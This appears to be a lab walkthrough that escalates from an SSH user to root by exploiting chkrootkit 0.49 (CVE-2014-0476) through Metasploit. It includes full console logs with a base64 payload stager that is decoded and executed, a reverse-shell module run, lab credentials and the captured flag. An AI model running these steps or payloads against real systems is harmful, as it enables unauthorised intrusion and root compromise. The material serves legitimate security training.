Linux Privilege Escalation: Exploiting A Vulnerable Program
Linux Privilege Escalation
The privilege escalation techniques we can utilize will depend on the version of the Linux kernel running on the target system as well as the distribution release version.
MSF offers very little in regard to Linux kernel exploit modules. However, in some cases, there may be an exploit module that can be utilized to exploit a vulnerable service or program in order to elevate our privileges.
Demo: Linux Privilege Escalation: Exploiting A Vulnerable Program
ifconfig
eth0: 10.1.1.5
eth1: 192.124.219.2
Target IP Address: 192.124.219.3
service postgresql start && msfconsole -q
workspace -a LinuxPrivEsc
setg RHOSTS 192.124.219.3
db_nmap -sV 192.124.219.3
search ssh_login
use auxiliary/scanner/ssh/ssh_login
show options
set USERNAME jackie
set PASSWORD password
exploit
This authenticates as jackie over SSH and opens a command shell session on the target.
sessions
sessions 1
That gives us access to the Linux system via a command shell.
pwd
Open up a bash session here.
/bin/bash -i
We are currently logged in as the user Jackie. We can perform some basic enumeration.
jackie@victim-1:~$ whoami
We are indeed Jackie.
jackie@victim-1:~$ cat /etc/*issue
That’s the distribution release version.
jackie@victim-1:~$ uname -r
We get the kernel version.
We want to establish a Meterpreter session or to upgrade our command shell session into a Meterpreter session.
Put this in the background.
jackie@victim-1:~$ ^Z
Background session 1 [y/N] y
Use sessions -u to upgrade session 1 to a Meterpreter session, then interact with the new session.
sessions -u 1
sessions
sessions 2
meterpreter > sysinfo
meterpreter > getuid
Meterpreter reports the username as no-user, but it does give the uid (1000), which is jackie.
Open up a bash session here.
meterpreter > shell
/bin/bash -i
Enumerate the users on the system.
cat /etc/passwd
Only two accounts have an interactive shell: jackie and root. The rest are service accounts. We want to elevate our privileges to root.
In order to identify the vulnerable program or service, list the processes running on the system with ps aux.
jackie@victim-1:~$ ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 33 0.0 0.0 9916 2700 ? S 00:17 0:00 /bin/bash /bin/check-down
Looking at the process list, root has started a program called check-down, executed with bash and stored under /bin.
We can check what this file does by catting it; it could be a binary or a script.
jackie@victim-1:~$ cat /bin/check-down
#!/bin/bash
while :
do
/usr/local/bin/chkrootkit/chkrootkit -x > /dev/null 2>&1
sleep 60
done
In this case, it looks like it is a Bash script.
check-down is an infinite loop that runs chkrootkit every 60 seconds.
What is chkrootkit? chkrootkit is a Linux utility that scans a system for signs of known rootkits.
The chkrootkit on this target is affected by a local privilege escalation vulnerability (CVE-2014-0476), but only versions before 0.50 are affected.
Check out the version of chkrootkit.
jackie@victim-1:~$ chkrootkit --help
Usage: /bin/chkrootkit [options] [test ...]
We can enumerate the version with -V.
jackie@victim-1:~$ chkrootkit -V
The version of chkrootkit is 0.49, which is before 0.50, so this binary can be exploited to elevate our privileges.
Terminate the shell channel with Ctrl-C, then put the Meterpreter session in the background.
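As an added example (not part of the INE walkthrough), the two enumeration steps above, finding root-owned processes that run a script and checking whether a chkrootkit -V banner falls in the affected range, as POSIX shell functions. The ps aux sample is constructed from the process list on this target:

```shell
#!/bin/sh
# Added example (not from the walkthrough): triage helpers for the two checks above.

# Constructed sample of `ps aux` output, trimmed from the target in this lab.
SAMPLE_PS='USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 4624 852 ? Ss 03:08 0:00 /bin/sh -c /usr/local/bin/start.sh
root 12 0.0 0.0 28352 2604 ? Ss 03:08 0:00 /usr/sbin/cron
root 30 0.0 0.0 9916 2800 ? S 03:09 0:00 /bin/bash /bin/check-down
jackie 2909 0.0 0.0 18372 3072 ? Ss 03:15 0:00 -bash
root 8269 0.0 0.0 4528 768 ? S 03:28 0:00 sleep 60'

# Print "PID SCRIPT" for every root-owned process whose command is an interpreter
# given a script path as its first argument (the "/bin/bash /bin/check-down" pattern).
# Usage on a live box: root_interpreter_scripts "$(ps aux)"
root_interpreter_scripts() {
    printf '%s\n' "$1" | awk '
        NR > 1 && $1 == "root" && NF >= 12 {
            interp = $11; sub(/.*\//, "", interp)
            if (interp ~ /^(sh|bash|dash|python[0-9.]*|perl)$/ && $12 ~ /^\//)
                print $2, $12
        }'
}

# Succeed when a `chkrootkit -V` banner reports a version before 0.50, the range
# affected by CVE-2014-0476. Returns 2 if no "version X.Y" can be parsed.
# Usage on a live box: chkrootkit_before_050 "$(chkrootkit -V)"
chkrootkit_before_050() {
    ver=$(printf '%s\n' "$1" | sed -n 's/.*version \([0-9][0-9]*\)\.\([0-9][0-9]*\).*/\1 \2/p')
    [ -n "$ver" ] || return 2
    set -- $ver            # $1 = major, $2 = minor
    [ "$1" -eq 0 ] && [ "$2" -lt 50 ]
}

# Put the two together: list candidate scripts, then classify the version seen on this target.
triage() {
    root_interpreter_scripts "$SAMPLE_PS"
    if chkrootkit_before_050 "chkrootkit version 0.49"; then
        echo "chkrootkit is in the affected range (before 0.50)"
    else
        echo "chkrootkit is not in the affected range"
    fi
}
```

On the target, root_interpreter_scripts "$(ps aux)" prints "30 /bin/check-down", which is the script to read next; the version helper parses the "chkrootkit version 0.49" banner rather than comparing strings, so 0.5 and 0.50 are not confused.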
jackie@victim-1:~$ ^C
Put the Meterpreter session in the background.
Background session 2? [y/N] y
Search for the chkrootkit exploit module here.
search chkrootkit
use exploit/unix/local/chkrootkit
show options
Chkrootkit Local Privilege Escalation
Chkrootkit before 0.50 will run any executable file named /tmp/update as root, allowing a trivial privilege escalation. WfsDelay is set to 24h, since this is how often a chkrootkit scan is scheduled by default.
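The module description says chkrootkit before 0.50 runs any executable named /tmp/update as root. The root cause, documented in the oss-sec advisory the module references, is an unquoted assignment in chkrootkit's slapper() test, file_port=$file_port $i: when file_port is empty the shell parses that line as "run the command $i with a temporary environment assignment", so a file from the suspicious-path list is executed instead of recorded. The following is an added example, not chkrootkit's code or the module's: it reproduces the pattern in a throw-away directory with a harmless marker script, next to the quoted form that 0.50 uses.

```shell
#!/bin/sh
# Added example: reproduces the shell bug behind CVE-2014-0476 in a sandbox directory.
# This is not chkrootkit's own code; it models the slapper() pattern in which a list
# of suspicious paths is accumulated into the variable file_port.

# Vulnerable form: "file_port=$file_port $i" with file_port empty is parsed by the
# shell as   file_port= <path>   i.e. execute <path> with a temporary environment
# assignment. chkrootkit runs as root, so <path> runs as root.
collect_vulnerable() {
    dir=$1
    file_port=
    for i in "$dir/update" "$dir/.bugtraq"; do
        if [ -f "$i" ]; then
            file_port=$file_port $i
        fi
    done
    printf '%s\n' "$file_port"
}

# Fixed form (what 0.50 does): quote the assignment so the path is stored, not run.
collect_fixed() {
    dir=$1
    file_port=
    for i in "$dir/update" "$dir/.bugtraq"; do
        if [ -f "$i" ]; then
            file_port="$file_port $i"
        fi
    done
    printf '%s\n' "$file_port"
}

# Run both forms against a sandbox containing an executable "update" that only
# touches a marker file. Prints "<vulnerable_executed> <fixed_executed>".
demo() {
    sandbox=$(mktemp -d)
    marker="$sandbox/marker"
    printf '#!/bin/sh\ntouch "%s"\n' "$marker" > "$sandbox/update"
    chmod 755 "$sandbox/update"

    collect_vulnerable "$sandbox" > /dev/null
    if [ -e "$marker" ]; then vuln=1; else vuln=0; fi
    rm -f "$marker"

    collect_fixed "$sandbox" > /dev/null
    if [ -e "$marker" ]; then fixed=1; else fixed=0; fi

    rm -rf "$sandbox"
    printf '%s %s\n' "$vuln" "$fixed"
}
```

demo prints "1 0": the unquoted form executes the planted file, the quoted form merely appends its path. This is also why the Metasploit module only has to drop a payload at /tmp/update and wait; nothing about cron is exploited, the scheduler just triggers the vulnerable test.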
The payload option can also be configured; the payload in use here, cmd/unix/reverse, is a simple Unix command shell payload.
info
Enumeration showed chkrootkit under /bin (the usage line read /bin/chkrootkit), not at the module default of /usr/sbin/chkrootkit, so point the module at the path that actually exists on the target:
set CHKROOTKIT /bin/chkrootkit
set SESSION 2
We want to run this via the Meterpreter session.
set LHOST 192.124.219.2
exploit
^C
The module writes the payload to /tmp/update and then waits for chkrootkit to run; it does not create a cron job itself. On a default install chkrootkit is scheduled daily, which is why WfsDelay is 24h, but here check-down runs it every 60 seconds. Despite the earlier set LHOST, the first run bound the handler to 10.1.0.5 (the eth0 address), which the target cannot reach, so no callback could arrive. Interrupt it with Ctrl-C, check show options, set LHOST to the eth1 address on the lab network, and run it again.
show options
set LHOST 192.124.219.2
exploit
If the module fails its check, make sure CHKROOTKIT is the absolute path of the chkrootkit on the target (here /bin/chkrootkit, the path chkrootkit --help reported). Whichever vulnerable copy the scheduler runs will pick up /tmp/update; here check-down runs /usr/local/bin/chkrootkit/chkrootkit every 60 seconds, so the wait is short.
We get a command shell session open.
/bin/bash -i
root@victim-1:~#
We now have root access and have successfully been able to elevate our privileges.
root@victim-1:~# whoami
root
We are root, and we now have root privileges.
That is how to elevate privileges on a Linux system by exploiting a vulnerable program or binary present on it. The same approach applies to kernel exploits, but since Metasploit has few Linux kernel exploit modules, those usually have to be done manually, which involves transferring the exploit code to the target and running it there yourself.
Privilege Escalation - Rootkit Scanner
Overview
The target server as described below is running vulnerable Rootkit Scanner. Your task is to exploit a known issue using the appropriate Metasploit module and escalate to root user.
Objective: Escalate to root user on the target machine and retrieve the flag!
SSH Login Credentials:
| Username | Password |
| --- | --- |
| jackie | password |
Instructions:
- This lab is dedicated to you! No other users are on this network
- Once you start the lab, you will have access to a root terminal of a Kali instance
- Your Kali has an interface with IP address 192.X.Y.2. Run “ip addr” to know the values of X and Y.
- The target server should be located at the IP address 192.X.Y.3.
- Do not attack the gateway located at IP address 192.X.Y.1
- postgresql is not running by default so Metasploit may give you an error about this when starting
Solutions
The solution for this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-1396.pdf
Reproducing the video
root@attackdefense:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.1.0.5 netmask 255.255.0.0 broadcast 10.1.255.255
ether 02:42:0a:01:00:05 txqueuelen 0 (Ethernet)
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.127.83.2 netmask 255.255.255.0 broadcast 192.127.83.255
ether 02:42:c0:7f:53:02 txqueuelen 0 (Ethernet)
Target IP Address: 192.127.83.3
root@attackdefense:~# service postgresql start && msfconsole -q
Starting PostgreSQL 12 database server: main.
msf5 > workspace -a LinuxPrivEsc
[*] Added workspace: LinuxPrivEsc
[*] Workspace: LinuxPrivEsc
msf5 > setg RHOSTS 192.127.83.3
RHOSTS => 192.127.83.3
msf5 > db_nmap -sV 192.127.83.3
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2023-03-12 03:12 UTC
[*] Nmap: Nmap scan report for target-1 (192.127.83.3)
[*] Nmap: Host is up (0.000010s latency).
[*] Nmap: Not shown: 999 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
[*] Nmap: MAC Address: 02:42:C0:7F:53:03 (Unknown)
[*] Nmap: Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.54 seconds
msf5 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.127.83.3 22 tcp ssh open OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 Ubuntu Linux; protocol 2.0
msf5 > search ssh_login
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/ssh/ssh_login normal No SSH Login Check Scanner
1 auxiliary/scanner/ssh/ssh_login_pubkey normal No SSH Public Key Login Scanner
msf5 > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS 192.127.83.3 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts
msf5 auxiliary(scanner/ssh/ssh_login) > set USERNAME jackie
USERNAME => jackie
msf5 auxiliary(scanner/ssh/ssh_login) > set PASSWORD password
PASSWORD => password
msf5 auxiliary(scanner/ssh/ssh_login) > exploit
[+] 192.127.83.3:22 - Success: 'jackie:password' ''
[*] Command shell session 1 opened (192.127.83.2:40663 -> 192.127.83.3:22) at 2023-03-12 03:15:52 +0000
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_login) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell unknown SSH jackie:password (192.127.83.3:22) 192.127.83.2:40663 -> 192.127.83.3:22 (192.127.83.3)
msf5 auxiliary(scanner/ssh/ssh_login) > sessions 1
[*] Starting interaction with 1...
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 5.4.0-125-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
pwd
/home/jackie
/bin/bash -i
bash: cannot set terminal process group (2909): Inappropriate ioctl for device
bash: no job control in this shell
jackie@victim-1:~$
jackie@victim-1:~$ whoami
whoami
jackie
jackie@victim-1:~$ cat /etc/*issue
cat /etc/*issue
Ubuntu 18.04.3 LTS \n \l
jackie@victim-1:~$ uname -r
uname -r
5.4.0-125-generic
jackie@victim-1:~$ ^Z
Background session 1? [y/N] y
msf5 auxiliary(scanner/ssh/ssh_login) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell unknown SSH jackie:password (192.127.83.3:22) 192.127.83.2:40663 -> 192.127.83.3:22 (192.127.83.3)
msf5 auxiliary(scanner/ssh/ssh_login) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
[!] SESSION may not be compatible with this module.
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.127.83.2:4433
[*] Sending stage (980808 bytes) to 192.127.83.3
[*] Meterpreter session 2 opened (192.127.83.2:4433 -> 192.127.83.3:53736) at 2023-03-12 03:23:09 +0000
[-] Error: Unable to execute the following command: "echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAA
ASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1towH9TAmgCABFRieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZsmqwA82
AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/GhXch.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl
enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which per
l >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/YePRk' < '/tmp/GhXch.b64' ; chmod +x '/tmp/YePRk' ; '/tmp/YePRk' & sleep 2
; rm -f '/tmp/YePRk' ; rm -f '/tmp/GhXch.b64'"
[-] Output: "[1] 5804"
msf5 auxiliary(scanner/ssh/ssh_login) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell unknown SSH jackie:password (192.127.83.3:22) 192.127.83.2:40663 -> 192.127.83.3:22 (192.127.83.3)
2 meterpreter x86/linux no-user @ victim-1 (uid=1000, gid=1000, euid=1000, egid=1000) @ 192.127.83.3 192.127.83.2:4433 -> 192.127.83.3:53736 (192.127.83.3)
msf5 auxiliary(scanner/ssh/ssh_login) > sessions 2
[*] Starting interaction with 2...
meterpreter > sysinfo
Computer : 192.127.83.3
OS : Ubuntu 18.04 (Linux 5.4.0-125-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > getuid
Server username: no-user @ victim-1 (uid=1000, gid=1000, euid=1000, egid=1000)
meterpreter > shell
Process 7443 created.
Channel 1 created.
/bin/bash -i
bash: cannot set terminal process group (2909): Inappropriate ioctl for device
bash: no job control in this shell
jackie@victim-1:~$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
messagebus:x:103:105::/nonexistent:/usr/sbin/nologin
sshd:x:104:65534::/run/sshd:/usr/sbin/nologin
jackie:x:1000:1000:,,,:/home/jackie:/bin/bash
jackie@victim-1:~$ ps aux
ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 4624 852 ? Ss 03:08 0:00 /bin/sh -c /usr/local/bin/start.sh
root 7 0.0 0.0 55104 20420 ? S 03:08 0:00 /usr/bin/python /usr/bin/supervisord -n
root 12 0.0 0.0 28352 2604 ? Ss 03:08 0:00 /usr/sbin/cron
root 22 0.0 0.0 72292 3360 ? Ss 03:08 0:00 /usr/sbin/sshd
root 30 0.0 0.0 9916 2800 ? S 03:09 0:00 /bin/bash /bin/check-down
root 2897 0.0 0.0 101548 6996 ? Ss 03:15 0:00 sshd: jackie [priv]
jackie 2908 0.0 0.0 103848 5568 ? S 03:15 0:00 sshd: jackie@notty
jackie 2909 0.0 0.0 18372 3072 ? Ss 03:15 0:00 -bash
jackie 4145 0.0 0.0 18504 3528 ? S 03:18 0:00 /bin/bash -i
jackie 5804 0.0 0.0 1144 1024 ? S 03:23 0:00 /tmp/YePRk
jackie 7443 0.0 0.0 4624 828 ? S 03:26 0:00 /bin/sh
jackie 7444 0.0 0.0 18504 3436 ? S 03:26 0:00 /bin/bash -i
root 8269 0.0 0.0 4528 768 ? S 03:28 0:00 sleep 60
jackie 8270 0.0 0.0 34396 2936 ? R 03:28 0:00 ps aux
jackie@victim-1:~$ cat /bin/check-down
cat /bin/check-down
#!/bin/bash
while :
do
/usr/local/bin/chkrootkit/chkrootkit -x > /dev/null 2>&1
sleep 60
done
jackie@victim-1:~$ chkrootkit --help
chkrootkit --help
Usage: /bin/chkrootkit [options] [test ...]
Options:
-h show this help and exit
-V show version information and exit
-l show available tests and exit
-d debug
-q quiet mode
-x expert mode
-r dir use dir as the root directory
-p dir1:dir2:dirN path for the external commands used by chkrootkit
-n skip NFS mounted dirs
jackie@victim-1:~$ chkrootkit -V
chkrootkit -V
chkrootkit version 0.49
jackie@victim-1:~$ ^C
Terminate channel 1? [y/N] Y
meterpreter >
Background session 2? [y/N]
msf5 auxiliary(scanner/ssh/ssh_login) > search chkrootkit
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/local/chkrootkit 2014-06-04 manual Yes Chkrootkit Local Privilege Escalation
msf5 auxiliary(scanner/ssh/ssh_login) > use exploit/unix/local/chkrootkit
msf5 exploit(unix/local/chkrootkit) > info
Name: Chkrootkit Local Privilege Escalation
Module: exploit/unix/local/chkrootkit
Platform: Unix
Arch: cmd
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Manual
Disclosed: 2014-06-04
Provided by:
Thomas Stangner
Julien "jvoisin" Voisin
Available targets:
Id Name
-- ----
0 Automatic
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CHKROOTKIT /usr/sbin/chkrootkit yes Path to chkrootkit
SESSION yes The session to run this module on.
Payload information:
Description:
Chkrootkit before 0.50 will run any executable file named
/tmp/update as root, allowing a trivial privilege escalation.
WfsDelay is set to 24h, since this is how often a chkrootkit scan is
scheduled by default.
References:
https://cvedetails.com/cve/CVE-2014-0476/
OSVDB (107710)
https://www.exploit-db.com/exploits/33899
http://www.securityfocus.com/bid/67813
https://cwe.mitre.org/data/definitions/20.html
https://seclists.org/oss-sec/2014/q2/430
msf5 exploit(unix/local/chkrootkit) > set CHKROOTKIT /bin/chkrootkit
CHKROOTKIT => /bin/chkrootkit
msf5 exploit(unix/local/chkrootkit) > set SESSION 2
SESSION => 2
msf5 exploit(unix/local/chkrootkit) > set LHOST 192.127.83.2
LHOST => 192.127.83.2
msf5 exploit(unix/local/chkrootkit) > exploit
[*] Started reverse TCP double handler on 10.1.0.5:4444
[!] Rooting depends on the crontab (this could take a while)
[*] Payload written to /tmp/update
[*] Waiting for chkrootkit to run via cron...
^C[*] Exploit completed, but no session was created.
msf5 exploit(unix/local/chkrootkit) > show options
Module options (exploit/unix/local/chkrootkit):
Name Current Setting Required Description
---- --------------- -------- -----------
CHKROOTKIT /bin/chkrootkit yes Path to chkrootkit
SESSION 2 yes The session to run this module on.
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.1.0.5 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(unix/local/chkrootkit) > set LHOST 192.127.83.2
LHOST => 192.127.83.2
msf5 exploit(unix/local/chkrootkit) > exploit
[*] Started reverse TCP double handler on 192.127.83.2:4444
[!] Rooting depends on the crontab (this could take a while)
[*] Payload written to /tmp/update
[*] Waiting for chkrootkit to run via cron...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 0Kzfr8NXEhMfYSZc;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "0Kzfr8NXEhMfYSZc\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 3 opened (192.127.83.2:4444 -> 192.127.83.3:47900) at 2023-03-12 03:49:26 +0000
[+] Deleted /tmp/update
/bin/bash -i
bash: cannot set terminal process group (26): Inappropriate ioctl for device
bash: no job control in this shell
root@victim-1:~# whoami
whoami
root
root@victim-1:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@victim-1:~# pwd
pwd
/root
root@victim-1:~# ls
ls
flag
root@victim-1:~# cat flag
cat flag
9db8bf8f483ff50857f26f9bd636bed6
root@victim-1:~#